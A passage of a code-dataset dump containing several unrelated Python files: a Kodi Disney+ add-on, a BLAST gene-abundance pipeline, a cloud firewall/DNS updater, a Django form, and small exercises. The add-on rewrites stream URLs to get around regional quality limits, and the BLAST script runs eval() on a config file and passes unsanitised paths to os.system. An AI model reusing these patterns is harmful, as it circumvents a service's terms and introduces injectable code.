**kwargs):\n data = api.collection_by_slug(slug, content_class)\n\n folder = plugin.Folder(label or _get_text(data['texts'], 'title', 'collection'), fanart=_image(data.get('images', []), 'fanart'))\n thumb = _image(data.get('images', []), 'thumb')\n\n for row in data['containers']:\n _type = row.get('type')\n _set = row.get('set')\n\n if _set.get('refIdType') == 'setId':\n set_id = _set['refId']\n else:\n set_id = _set.get('setId')\n\n if not set_id:\n return None\n\n if slug == 'home' and _set['contentClass'] == 'brandSix':\n continue\n\n # if _set['contentClass'] in ('hero', 'episode', 'WatchlistSet'): # dont think need episode here..\n if _set['contentClass'] in ('hero', 'WatchlistSet'):\n items = _process_rows(_set.get('items', []), _set['contentClass'])\n folder.add_items(items)\n continue\n\n elif _set['contentClass'] == 'BecauseYouSet':\n data = api.set_by_id(set_id, _set['contentClass'], page_size=0)\n if not data['meta']['hits']:\n continue\n\n title = _get_text(data['texts'], 'title', 'set')\n\n else:\n title = _get_text(_set['texts'], 'title', 'set')\n\n folder.add_item(\n label = title,\n art = {'thumb': thumb},\n path = plugin.url_for(sets, set_id=set_id, set_type=_set['contentClass']),\n )\n\n return folder\n\n@plugin.route()\ndef sets(set_id, set_type, page=1, **kwargs):\n page = int(page)\n data = api.set_by_id(set_id, set_type, page=page)\n\n folder = plugin.Folder(_get_text(data['texts'], 'title', 'set'), sort_methods=[xbmcplugin.SORT_METHOD_UNSORTED, xbmcplugin.SORT_METHOD_VIDEO_YEAR, xbmcplugin.SORT_METHOD_LABEL])\n\n items = _process_rows(data.get('items', []), data['contentClass'])\n folder.add_items(items)\n\n if (data['meta']['page_size'] + data['meta']['offset']) < data['meta']['hits']:\n folder.add_item(\n label = _(_.NEXT_PAGE, 
page=page+1),\n path = plugin.url_for(sets, set_id=set_id, set_type=set_type, page=page+1),\n specialsort = 'bottom',\n )\n\n return folder\n\ndef _process_rows(rows, content_class=None):\n items = []\n continue_watching = {}\n\n if settings.getBool('disney_sync', False):\n continue_watching = api.continue_watching()\n\n for row in rows:\n item = None\n content_type = row.get('type')\n\n if content_type == 'DmcVideo':\n program_type = row.get('programType')\n\n if program_type == 'episode':\n if content_class in ('episode', 'ContinueWatchingSet'):\n item = _parse_video(row)\n else:\n item = _parse_series(row)\n else:\n item = _parse_video(row)\n\n if item.playable and settings.getBool('disney_sync', False):\n item.properties['ResumeTime'] = continue_watching.get(row['contentId'], 0)\n item.properties['TotalTime'] = continue_watching.get(row['contentId'], 0)\n\n elif content_type == 'DmcSeries':\n item = _parse_series(row)\n\n elif content_type == 'StandardCollection':\n item = _parse_collection(row)\n\n if not item:\n continue\n\n if content_class == 'WatchlistSet':\n item.context.insert(0, (_.DELETE_WATCHLIST, 'RunPlugin({})'.format(plugin.url_for(delete_watchlist, content_id=row['contentId']))))\n elif content_type == 'DmcSeries' or (content_type == 'DmcVideo' and program_type != 'episode'):\n item.context.insert(0, (_.ADD_WATCHLIST, 'RunPlugin({})'.format(plugin.url_for(add_watchlist, content_id=row['contentId'], title=item.label, icon=item.art.get('thumb')))))\n\n items.append(item)\n\n return items\n\n@plugin.route()\ndef add_watchlist(content_id, title=None, icon=None, **kwargs):\n gui.notification(_.ADDED_WATCHLIST, heading=title, icon=icon)\n api.add_watchlist(content_id)\n\n@plugin.route()\ndef delete_watchlist(content_id, **kwargs):\n data = api.delete_watchlist(content_id)\n\n if not data.get('watchlistItems'):\n gui.redirect(plugin.url_for(''))\n else:\n gui.refresh()\n\ndef _parse_collection(row):\n return plugin.Item(\n label = _get_text(row['texts'], 'title', 'collection'),\n info = {'plot': _get_text(row['texts'], 'description', 'collection')},\n art = {'thumb': _image(row['images'], 'thumb'), 'fanart': _image(row['images'], 'fanart')},\n path = plugin.url_for(collection, slug=row['collectionGroup']['slugs'][0]['value'], content_class=row['collectionGroup']['contentClass']),\n )\n\ndef _parse_series(row):\n return plugin.Item(\n label = _get_text(row['texts'], 'title', 'series'),\n art = {'thumb': _image(row['images'], 'thumb'), 'fanart': _image(row['images'], 'fanart')},\n info = {\n 'plot': _get_text(row['texts'], 'description', 'series'),\n 'year': row['releases'][0]['releaseYear'],\n 'mediatype': 'tvshow',\n 'genre': row['genres'],\n },\n path = plugin.url_for(series, series_id=row['encodedSeriesId']),\n )\n\ndef _parse_season(row, series):\n title = _(_.SEASON, season=row['seasonSequenceNumber'])\n\n return plugin.Item(\n label = title,\n info = {\n 'plot': _get_text(row['texts'], 'description', 'season'),\n 'year': row['releases'][0]['releaseYear'],\n 'season': row['seasonSequenceNumber'],\n 'mediatype' : 'season',\n },\n art = {'thumb': _image(row['images'] or series['images'], 'thumb')},\n path = plugin.url_for(season, season_id=row['seasonId'], title=title),\n )\n\ndef _get_play_path(content_id, skip_intro=None):\n kwargs = {\n 'content_id': content_id,\n 'profile_id': userdata.get('profile_id', ''),\n }\n\n if settings.getBool('disney_sync', False):\n kwargs['sync'] = 1\n\n if skip_intro != None:\n kwargs['skip_intro'] = skip_intro\n\n return plugin.url_for(play, 
**kwargs)\n\ndef _parse_video(row):\n item = plugin.Item(\n label = _get_text(row['texts'], 'title', 'program'),\n info = {\n 'plot': _get_text(row['texts'], 'description', 'program'),\n 'duration': row['mediaMetadata']['runtimeMillis']/1000,\n 'year': row['releases'][0]['releaseYear'],\n 'dateadded': row['releases'][0]['releaseDate'] or row['releases'][0]['releaseYear'],\n 'mediatype': 'movie',\n 'genre': row['genres'],\n 'season': row['seasonSequenceNumber'],\n 'episode': row['episodeSequenceNumber'],\n },\n art = {'thumb': _image(row['images'], 'thumb'), 'fanart': _image(row['images'], 'fanart')},\n path = _get_play_path(row['contentId']),\n playable = True,\n )\n\n if _get_milestone(row.get('milestones'), 'intro_end'):\n if settings.getBool('skip_intros', False):\n item.context.append((_.INCLUDE_INTRO, 'PlayMedia({},noresume)'.format(_get_play_path(row['contentId'], skip_intro=0))))\n else:\n item.context.append((_.SKIP_INTRO, 'PlayMedia({},noresume)'.format(_get_play_path(row['contentId'], skip_intro=1))))\n\n if row['programType'] == 'episode':\n item.info.update({\n 'mediatype' : 'episode',\n 'tvshowtitle': _get_text(row['texts'], 'title', 'series'),\n })\n else:\n item.context.append((_.EXTRAS, \"Container.Update({})\".format(plugin.url_for(extras, family_id=row['encodedParentOf'], fanart=_image(row['images'], 'fanart')))))\n item.context.append((_.SUGGESTED, \"Container.Update({})\".format(plugin.url_for(suggested, family_id=row['encodedParentOf']))))\n\n if row['currentAvailability']['appears']:\n available = arrow.get(row['currentAvailability']['appears'])\n if available > arrow.now():\n item.label = _(_.AVAILABLE, label=item.label, date=available.to('local').format(_.AVAILABLE_FORMAT))\n\n return item\n\ndef _image(data, _type='thumb'):\n _types = {\n 'thumb': (('thumbnail','1.78'), ('tile','1.78')),\n 'fanart': (('background','1.78'), ('background_details','1.78'), ('hero_collection','1.78')),\n }\n\n selected = _types[_type]\n\n images = []\n for row in data:\n for index, _type in enumerate(selected):\n if not row['url']:\n continue\n\n if row['purpose'] == _type[0] and str(row['aspectRatio']) == _type[1]:\n images.append([index, row])\n\n if not images:\n return None\n\n chosen = sorted(images, key=lambda x: (x[0], -x[1]['masterWidth']))[0][1]\n\n if _type == 'fanart':\n return chosen['url'] + '/scale?aspectRatio=1.78&format=jpeg'\n else:\n return chosen['url'] + '/scale?width=800&aspectRatio=1.78&format=jpeg'\n\ndef _get_text(texts, field, source):\n _types = ['medium', 'brief', 'full']\n\n candidates = []\n for row in texts:\n if row['field'] == field and source == row['sourceEntity']:\n if not row['content']:\n continue\n\n if row['type'] not in _types:\n _types.append(row['type'])\n\n candidates.append((_types.index(row['type']), row['content']))\n\n if not candidates:\n return None\n\n return sorted(candidates, key=lambda x: x[0])[0][1]\n\n@plugin.route()\ndef series(series_id, **kwargs):\n data = api.series_bundle(series_id, page_size=0)\n\n title = _get_text(data['series']['texts'], 'title', 'series')\n folder = plugin.Folder(title, fanart=_image(data['series']['images'], 'fanart'))\n\n for row in data['seasons']['seasons']:\n item = _parse_season(row, data['series'])\n folder.add_items(item)\n\n if data['extras']['videos']:\n folder.add_item(\n label = (_.EXTRAS),\n art = {'thumb': _image(data['series']['images'], 'thumb')},\n path = plugin.url_for(extras, family_id=data['series']['family']['encodedFamilyId'], fanart=_image(data['series']['images'], 'fanart')),\n 
)\n\n if data['related']['items']:\n folder.add_item(\n label = _.SUGGESTED,\n art = {'thumb': _image(data['series']['images'], 'thumb')},\n path = plugin.url_for(suggested, series_id=series_id),\n )\n\n return folder\n\n@plugin.route()\ndef season(season_id, title, page=1, **kwargs):\n page = int(page)\n data = api.episodes([season_id,], page=page)\n\n folder = plugin.Folder(title, sort_methods=[xbmcplugin.SORT_METHOD_EPISODE, xbmcplugin.SORT_METHOD_UNSORTED, xbmcplugin.SORT_METHOD_LABEL, xbmcplugin.SORT_METHOD_DATEADDED])\n\n items = _process_rows(data['videos'], content_class='episode')\n folder.add_items(items)\n\n if ((data['meta']['episode_page_size'] * data['meta']['episode_page']) < data['meta']['max_hits_per_season']):\n folder.add_item(\n label = _(_.NEXT_PAGE, page=page+1),\n path = plugin.url_for(season, season_id=season_id, title=title, page=page+1),\n specialsort = 'bottom',\n )\n\n return folder\n\n@plugin.route()\ndef suggested(family_id=None, series_id=None, **kwargs):\n if family_id:\n data = api.video_bundle(family_id)\n elif series_id:\n data = api.series_bundle(series_id, page_size=0)\n\n folder = plugin.Folder(_.SUGGESTED)\n\n items = _process_rows(data['related']['items'])\n folder.add_items(items)\n\n return folder\n\n@plugin.route()\ndef extras(family_id, fanart=None, **kwargs):\n folder = plugin.Folder(_.EXTRAS, fanart=fanart)\n data = api.extras(family_id)\n items = _process_rows(data['videos'])\n folder.add_items(items)\n return folder\n\n@plugin.route()\ndef search(query=None, page=1, **kwargs):\n page = int(page)\n\n if not query:\n query = gui.input(_.SEARCH, default=userdata.get('search', '')).strip()\n if not query:\n return\n\n userdata.set('search', query)\n\n folder = plugin.Folder(_(_.SEARCH_FOR, query=query))\n\n data = api.search(query, page=page)\n\n hits = [x['hit'] for x in data['hits']] if data['resultsType'] == 'real' else []\n items = _process_rows(hits)\n folder.add_items(items)\n\n if (data['meta']['page_size'] + data['meta']['offset']) < data['meta']['hits']:\n folder.add_item(\n label = _(_.NEXT_PAGE, page=page+1),\n path = plugin.url_for(search, query=query, page=page+1),\n specialsort = 'bottom',\n )\n\n return folder\n\n@plugin.route()\n@plugin.login_required()\ndef play(content_id=None, family_id=None, skip_intro=None, **kwargs):\n if KODI_VERSION > 18:\n ver_required = '2.6.0'\n else:\n ver_required = '2.4.5'\n\n ia = inputstream.Widevine(\n license_key = api.get_config()['services']['drm']['client']['endpoints']['widevineLicense']['href'],\n manifest_type = 'hls',\n mimetype = 'application/vnd.apple.mpegurl',\n )\n\n if not ia.check() or not inputstream.require_version(ver_required):\n gui.ok(_(_.IA_VER_ERROR, kodi_ver=KODI_VERSION, ver_required=ver_required))\n\n if family_id:\n data = api.video_bundle(family_id)\n if not data.get('video'):\n raise PluginError(_.NO_VIDEO_FOUND)\n\n video = data['video']\n else:\n data = api.videos(content_id)\n if not data.get('videos'):\n raise PluginError(_.NO_VIDEO_FOUND)\n\n video = data['videos'][0]\n\n playback_url = video['mediaMetadata']['playbackUrls'][0]['href']\n playback_data = api.playback_data(playback_url)\n media_stream = playback_data['stream']['complete']\n original_language = video.get('originalLanguage') or 'en'\n\n headers = api.session.headers\n ia.properties['original_audio_language'] = original_language\n\n ## Allow fullres worldwide ##\n media_stream = media_stream.replace('/mickey/ps01/', '/ps01/')\n ##############\n\n item = _parse_video(video)\n item.update(\n path = 
media_stream,\n inputstream = ia,\n headers = headers,\n use_proxy = True, #required for default languages\n proxy_data = {'default_language': original_language, 'original_language': original_language},\n )\n\n if kwargs[ROUTE_RESUME_TAG] and settings.getBool('disney_sync', False):\n continue_watching = api.continue_watching()\n item.resume_from = continue_watching.get(video['contentId'], 0)\n item.force_resume = True\n\n elif (int(skip_intro) if skip_intro is not None else settings.getBool('skip_intros', False)):\n item.resume_from = _get_milestone(video.get('milestones'), 'intro_end', default=0) / 1000\n\n item.play_next = {}\n\n if settings.getBool('skip_credits', False):\n next_start = _get_milestone(video.get('milestones'), 'up_next', default=0) / 1000\n item.play_next['time'] = next_start\n\n if video['programType'] == 'episode' and settings.getBool('play_next_episode', True):\n data = api.up_next(video['contentId'])\n for row in data.get('items', []):\n if row['type'] == 'DmcVideo' and row['programType'] == 'episode' and row['encodedSeriesId'] == video['encodedSeriesId']:\n item.play_next['next_file'] = _get_play_path(row['contentId'])\n break\n\n elif video['programType'] != 'episode' and settings.getBool('play_next_movie', False):\n data = api.up_next(video['contentId'])\n for row in data.get('items', []):\n if row['type'] == 'DmcVideo' and row['programType'] != 'episode':\n item.play_next['next_file'] = _get_play_path(row['contentId'])\n break\n\n if settings.getBool('wv_secure', False):\n item.inputstream.properties['license_flags'] = 'force_secure_decoder'\n\n if settings.getBool('disney_sync', False):\n telemetry = playback_data['tracking']['telemetry']\n item.callback = {\n 'type':'interval',\n 'interval': 20,\n 'callback': plugin.url_for(callback, media_id=telemetry['mediaId'], fguid=telemetry['fguid']),\n }\n\n return item\n\n@plugin.route()\n@plugin.no_error_gui()\ndef callback(media_id, fguid, _time, **kwargs):\n api.update_resume(media_id, fguid, int(_time))\n\ndef _get_milestone(milestones, key, default=None):\n if not milestones:\n return default\n\n for milestone in milestones:\n if milestone['milestoneType'] == key:\n return milestone['milestoneTime'][0]['startMillis']\n\n return default\n\n@plugin.route()\ndef logout(**kwargs):\n if not gui.yes_no(_.LOGOUT_YES_NO):\n return\n\n api.logout()\n userdata.delete('kid_lockdown')\n userdata.delete('avatar')\n userdata.delete('profile')\n userdata.delete('profile_id')\n gui.refresh()","repo_name":"paulofernandes314/arrownegra.github.io","sub_path":"slyguy.disney.plus/resources/lib/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":26351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34427404065","text":"import importlib\nimport os\nimport sys\n\nfrom absl import logging, flags\n\nfrom deepray.design_patterns import SingletonType\n\nFLAGS = flags.FLAGS\n\n\nclass InputMeta(metaclass=SingletonType):\n\n def __init__(self, conf_version=None):\n self.conf_version = conf_version if conf_version else FLAGS.input_meta_data_path\n self.conf = self.import_conf()\n\n def import_conf(self):\n project_path = os.path.abspath(os.curdir)\n conf_path = os.path.join(project_path, 'examples/Recommendation/CGC/conf')\n logging.info(conf_path)\n\n def file_name(file_dir, target):\n paths = []\n for root, dirs, files in os.walk(file_dir):\n basename = os.path.basename(root)\n if basename == target:\n paths.append(root)\n if len(paths) == 0:\n 
logging.info(f'Cannot find conf: {target}')\n sys.exit()\n elif len(paths) > 1:\n logging.info('Found more than one conf:')\n for path in paths:\n logging.info(' ', os.path.relpath(path, project_path))\n sys.exit()\n else:\n return paths[0]\n\n local_conf_path = file_name(conf_path, self.conf_version)\n conf_module = os.path.relpath(local_conf_path, project_path).replace(\"/\", \".\")\n conf = importlib.import_module(f'{conf_module}.params', '*')\n # import examples.Recommendation.CGC.conf.default_geek_predict.conf_geek_predict_mix_4_target_cgc_f2_1v8_weight_tfra_base_new.params as conf\n return conf\n","repo_name":"deepray-AI/deepray","sub_path":"deepray/utils/data/input_meta.py","file_name":"input_meta.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"21454661225","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThe read4 API is already defined for you.\n\n @param buf, a list of characters\n @return an integer\n def read4(buf):\n\n# Below is an example of how the read4 API can be called.\nfile = File(\"abcdefghijk\") # File is \"abcdefghijk\", initially file pointer (fp) points to 'a'\nbuf = [' '] * 4 # Create buffer with enough space to store characters\nread4(buf) # read4 returns 4. Now buf = ['a','b','c','d'], fp points to 'e'\nread4(buf) # read4 returns 4. Now buf = ['e','f','g','h'], fp points to 'i'\nread4(buf) # read4 returns 3. Now buf = ['i','j','k',...], fp points to end of file\n\"\"\"\n\n\nclass Solution(object):\n def __init__(self):\n self.queue = []\n\n def read(self, buf, n):\n \"\"\"\n Perf: Runtime: 16 ms, faster than 96.93% / Memory Usage: 11.9 MB, less than 6.43%\n :type buf: Destination buffer (List[str])\n :type n: Number of characters to read (int)\n :rtype: The number of actual characters read (int)\n \"\"\"\n count = 0\n while True:\n _buf = ['']*4\n read4(_buf)\n self.queue.extend(_buf)\n idx = min(len(self.queue), n-count)\n for i in range(idx):\n buf[count] = self.queue.pop(0)\n count += 1\n if idx == 0:\n break\n return count\n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"Interview_Feedback/Facebook/4-6/158. Read N Characters Given Read4 II - Call multiple times/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30471778002","text":"import pandas as pd\nimport numpy as np\nimport argparse\nimport sys\nimport re\nimport os\n\ndef parse_blast_output(blast_filepath, gene_group_type):\n mult = 3. if gene_group_type == 'prot' else 1.\n blast_output_columns = ['qseqid', 'qlen', 'bgi_id', 'slen',\n 'pident', 'length', 'mismatch', 'gapopen',\n 'qstart', 'qend', 'sstart', 'send',\n 'evalue', 'bitscore']\n\n blast_result = pd.read_csv(blast_filepath,\n names = blast_output_columns,\n sep='\\t', header=None\n )\n blast_result = blast_result[(blast_result.pident > 80) &\n (blast_result.length * mult / blast_result.slen > 0.8) &\n (blast_result.length * 1. 
/ blast_result.qlen > 0.8) &\n (blast_result.evalue < 1e-5)]\n return blast_result\n\ndef parse_coverage_files(sample_group_folder, group_name, bgi_names):\n samples_names = [name for name in os.listdir(sample_group_folder) if name.endswith('bp_cov.txt')]\n samples_names = [name[:-11] for name in samples_names]\n for sample_name in samples_names:\n sample_coverage_filepath = os.path.join(sample_group_folder, '%s.bp_cov.txt' % sample_name)\n sample_bgi_coverage = pd.read_csv(sample_coverage_filepath,\n sep='\\t', header=None, names=['bp_cov']\n )\n sample_bgi_coverage['sum_bp_cov'] = sum(sample_bgi_coverage['bp_cov'])\n sample_bgi_coverage['sample'] = sample_name\n sample_bgi_coverage['bgi_id'] = bgi_names\n sample_bgi_coverage['group_name'] = group_name\n yield sample_bgi_coverage\n\ndef create_coverage_file(blast_result_path, bgi_coverage_path, gene_group_name, output_folder, input_type, mg_groups):\n bgi_names_path = os.path.join('metadata', 'BGIGeneSet2010_genes.txt')\n bgi_names = pd.read_csv(bgi_names_path, sep='\\t', header=None, names=['bgi_id'])\n\n blast_result = parse_blast_output(\n blast_filepath=blast_result_path,\n gene_group_type=input_type\n )\n\n headers = ['qseqid', 'sample', 'group_name', 'abund']\n gene_group_abund_path = os.path.join(output_folder, '{}.tsv'.format(gene_group_name))\n with open(gene_group_abund_path, 'w') as f:\n f.write('\\t'.join(headers) + '\\n')\n\n for group_name in mg_groups:\n coverage_files = parse_coverage_files(\n sample_group_folder=os.path.join(bgi_coverage_path, group_name),\n group_name=group_name,\n bgi_names=bgi_names\n )\n\n for sample_bgi_coverage in coverage_files:\n coverage = pd.merge(blast_result, sample_bgi_coverage, on='bgi_id')\n coverage['abund'] = coverage['bp_cov'] / coverage['slen'] / coverage['sum_bp_cov']\n coverage = coverage.loc[:, ['qseqid', 'sample', 'group_name', 'abund']]\n coverage = coverage.groupby(['qseqid', 'sample', 'group_name']).sum()\n coverage.reset_index(inplace=True)\n coverage.to_csv(gene_group_abund_path,\n sep='\\t', mode='a',\n header=False, index=False)\n\ndef blast(input_file, input_type, gene_group_name, n_threads, config_pathes, blastdb_path):\n if not os.path.isfile(input_file):\n sys.stdout.write('Error: file {} doesn\\'t exist\\n'.format(input_file))\n sys.exit()\n\n if (input_type == 'prot'):\n blast_type = config_pathes['tblastn_path']\n elif (input_type == 'nucl'):\n blast_type = config_pathes['blastn_path']\n else:\n sys.stdout.write('Error: incorrect input type: {}\\n'.format(input_type))\n sys.exit()\n\n blast_result_path = os.path.join('blast_results', 'BLAST_result_{}.txt'.format(gene_group_name))\n outfmt = '\\'6 qseqid qlen sseqid slen pident length mismatch gapopen qstart qend sstart send evalue bitscore\\''\n cmd = '{blast_type} -num_threads {n_threads} -db {blastdb_path} -query {input_file} -out {blast_result_path} -evalue 1e-5 -outfmt {outfmt}'.format(\n blast_type=blast_type,\n n_threads=n_threads,\n blastdb_path=blastdb_path,\n input_file=input_file,\n blast_result_path=blast_result_path,\n outfmt=outfmt\n )\n os.system(cmd)\n\n return blast_result_path\n\ndef parse_arguments():\n available_groups = set(os.listdir('BGI_coverage'))\n parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument('input_file', type=str,\n help='path to input fasta file')\n parser.add_argument('input_type', type=str,\n help='type of fasta file (prot/nucl)')\n parser.add_argument('-o', '--output-folder', type=str, default='.',\n help='path to output folder 
(default: current dir)')\n parser.add_argument('-n', '--n-threads', type=int,\n help='number of BLAST threads (default: 1)', default=1)\n mg_help = ['select groups of metagenomes',\n 'available: {}'.format(', '.join('\\'{}\\''.format(group_name) for group_name in available_groups)),\n 'default: all']\n parser.add_argument('-mg', '--metagen-group', nargs='+',\n default=available_groups,\n help='\\n'.join(mg_help))\n args = vars(parser.parse_args())\n\n if not os.path.exists(args['input_file']):\n raise Exception('Input file doesn\\'t exist')\n\n if not os.path.exists(args['output_folder']) or not os.path.isdir(args['output_folder']):\n raise Exception('Output file folder doesn\\'t exist')\n\n if args['input_type'] not in {'prot', 'nucl'}:\n raise Exception('Invalid input type: {}'.format(args['input_type']))\n\n if args['n_threads'] <= 0:\n raise Exception('Invalid number of threads: {}'.format(args['n_threads']))\n\n wrong_groups = [group_name for group_name in args['metagen_group'] if group_name not in available_groups]\n if wrong_groups:\n raise Exception('Invalid groups of metagenomes: {}'.format(', '.join(wrong_groups)))\n\n return args\n\nif __name__ == '__main__':\n args = parse_arguments()\n mg_groups = args['metagen_group']\n input_type = args['input_type']\n input_file = args['input_file']\n output_folder = args['output_folder']\n n_threads = args['n_threads']\n\n gene_group_name = os.path.splitext(os.path.basename(input_file))[0]\n\n blastdb_path = os.path.join('BGI_blastdb', 'BGIGeneSet2010')\n bgi_coverage_path = 'BGI_coverage'\n\n with open('config.json') as f:\n config_pathes = eval(''.join(f.readlines()))\n\n sys.stdout.write('Running BLAST ... \\n')\n blast_result_path = blast(\n input_file=input_file,\n input_type=input_type,\n gene_group_name=gene_group_name,\n n_threads=n_threads,\n config_pathes=config_pathes,\n blastdb_path=blastdb_path\n )\n\n sys.stdout.write('Creating coverage file ... 
\\n')\n create_coverage_file(\n blast_result_path=blast_result_path,\n bgi_coverage_path=bgi_coverage_path,\n gene_group_name=gene_group_name,\n output_folder=output_folder,\n input_type=input_type,\n mg_groups=mg_groups\n )\n","repo_name":"kyarygin/Yarygin_2016","sub_path":"get_genes_abund.py","file_name":"get_genes_abund.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72173194089","text":"from django import forms\nfrom .models import TimeRecords\nfrom django.core.validators import MinLengthValidator\nfrom django.forms.widgets import SelectDateWidget\n\n\nclass CreateTimeSheetForm(forms.ModelForm): \n \n emp_id = forms.IntegerField(widget=forms.HiddenInput(), initial=123) \n class Meta:\n model = TimeRecords\n fields = '__all__'\n exclude = ['ts_status']\n labels = {\n \"ts_desc\": \"Task Description\"\n }\n widgets = {\n 'ts_date': forms.TextInput(attrs={'readonly': True, 'class': \"form-control\"}),\n 'ts_effort' : forms.TextInput(attrs={'type':'number', 'class': \"form-control\"}),\n 'ts_desc' : forms.TextInput(attrs={'class': \"form-control\"})\n }\n\n\n","repo_name":"26-saurabhmaheshwari/SESS","sub_path":"sess_dev/timesheets/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2582056957","text":"m, n = map(int, input('Введите размеры матрицы MxN через пробел: ').split())\nmatrix = []\nfor i in range(m):\n matrix.append(list(map(int, input('Введите элементы строки матрицы по возрастанию через пробел: ').split())))\n print(matrix[i])\nx = int(input('Введите искомый элемент матрицы: '))\n\nflag = True\nfor i in range(m):\n if matrix[i][0] <= x <= matrix[i][-1]:\n for j in range(n):\n if matrix[i][j] == x:\n print(i + 1, j + 1)\n flag = False\n break\nif flag:\n print(-1, -1)","repo_name":"HeraldOfWar/algos","sub_path":"lab_11/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38197635483","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport scipy.fftpack\nfrom scipy.fftpack import fft\nfrom scipy.io.wavfile import read\n\n\ndef get_audio():\n root_directory = 'labelled_data/'\n audio = np.ndarray(500)\n labels = []\n for directory in os.listdir(root_directory):\n for filename in os.listdir(root_directory + directory):\n wav_filename = root_directory + directory + '/' + filename\n samplerate, data = read(wav_filename)\n\n t_n = 10\n N = 1000\n T = t_n / N\n f_s = 1/T\n\n frequencies = np.linspace(0.0, 1.0 / (2.0*T), N//2)\n fft_values = fft(data[:, 0])\n fft_values = 2.0/N * np.abs(fft_values[0:N//2]) \n print(audio)\n print(fft_values)\n np.append(audio, fft_values, axis=0)\n break\n\n if directory == 'crash':\n labels.append('crash')\n else:\n labels.append('not_crash')\n\n return data, np.array(labels)\n \n# def get_data:\n # data = []\n # labels = []\n # for \n # wav_fname = 'crash2/1.wav'\n # samplerate, data = read(wav_fname)\n # length = data.shape[0] / samplerate\n # time = np.linspace(0., length, data.shape[0])\n # # plt.plot(time, data)\n # plt.plot(time, data[:, 0], label='Left Channel') \n # # plt.plot(time, data[:, 1], label='Right Channel')\n # plt.legend()\n # plt.xlabel('Time')\n # plt.ylabel('Amplitude')\n # plt.title('audio')\n # plt.show()\n\n # t_n = 10\n # N = 1000\n # T 
= t_n / N\n # f_s = 1/T\n\n # frequencies = np.linspace(0.0, 1.0/(2.0*T), N//2)\n # fft_values = fft(data[:, 0])\n # fft_values = 2.0/N * np.abs(fft_values_[0:N//2])\n\n # plt.plot(frequencies, fft_values)\n # plt.xlabel('Frequency [Hz]')\n # plt.ylabel('Amplitude')\n # plt.title(\"audio after fourier transform\")\n # plt.show()\n","repo_name":"Aarish-A/RoadSense","sub_path":"audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6616094046","text":"import requests, json\n\n# CloudFlare Config\napi_key = '-----'\napi_email = '-----'\napi_zone = '-----'\napi_dns = '-----'\nsub_domain = '-----'\n\n# DigitalOcean Config\nFWID = '-----'\nFWDroplets = ['-----','-----','-----']\nFWName = '-----'\nAPIKey = '-----'\n\n# get the current external IP\nextip = requests.get('https://api.ipify.org/')\nextip = extip.content\nprint('[*] Your external IP is ' + extip + '.')\n\n# grab IPv4 list from cloudflare\nresponse = requests.get('https://www.cloudflare.com/ips-v4')\nif response.status_code == requests.codes.ok:\n list = response.content\n CFlist = [s.strip() for s in list.splitlines()]\n print('[+] Obtained an updated list of CloudFlare IPv4 ranges.')\nelse:\n print('[-] Failed to obtain CloudFlare IPv4 ranges.')\n raise SystemExit(0)\n\n# DigitalOcean FW data\nFWData = {\n \"name\": FWName,\n \"droplet_ids\": FWDroplets,\n \"inbound_rules\": [\n {\n \"ports\": \"22\",\n \"protocol\": \"tcp\",\n \"sources\": {\n \"addresses\": [ extip ]\n }\n },\n {\n \"ports\": \"80\",\n \"protocol\": \"tcp\",\n \"sources\": {\n \"addresses\": CFlist\n }\n },\n {\n \"ports\": \"443\",\n \"protocol\": \"tcp\",\n \"sources\": {\n \"addresses\": CFlist\n }\n }\n ],\n \"tags\": []\n }\n\n\n# set the current IP on DigitalOcean\nurl = 'https://api.digitalocean.com/v2/firewalls/' + FWID\nhead = {\n 'Authorization' : 'Bearer ' + APIKey,\n 'Content-Type' : 'application/json'\n }\nresponse = requests.put(url, json=FWData, headers=head)\nif response.status_code == requests.codes.ok:\n print('[+] External IP and CloudFlare IPv4 list updated on DigitalOcean.')\nelse:\n print('[-] Failed to update external IP and CloudFlare IPv4 list on DigitalOcean.')\n raise SystemExit(0)\n\n# set the current IP on CloudFlare\nurl = 'https://api.cloudflare.com/client/v4/zones/' + api_zone + '/dns_records/' + api_dns\ndata = {\n 'type' : 'A',\n 'name' : sub_domain,\n 'content' : extip,\n 'ttl' : 120,\n 'proxied' : False\n }\nhead = {\n 'X-Auth-Email' : api_email,\n 'X-Auth-Key' : api_key,\n 'Content-Type' : 'application/json'\n }\nresponse = requests.put(url, json=data, headers=head)\n\nif response.status_code == requests.codes.ok:\n print('[+] External IP updated on Cloudflare.')\nelse:\n print('[-] Failed to update external IP on Cloudflare.')\n","repo_name":"OneLogicalMyth/Random-Scripts","sub_path":"UpdateIPs.py","file_name":"UpdateIPs.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"53"} +{"seq_id":"74553994086","text":"from tkinter import *\nfrom tkinter import filedialog, ttk\nimport tkinter.messagebox\nimport math\nimport sqlite3\nfrom OLD import date_picker\nimport datetime\nfrom collections import OrderedDict\n\n# currently working on: data correction; ??\n\n__author__ = 'Daniel Samet'\n\n\nclass TuckProgram:\n\n def __init__(self):\n \"\"\"initialises the window and creates the top_bar for navigation and main_frame to 
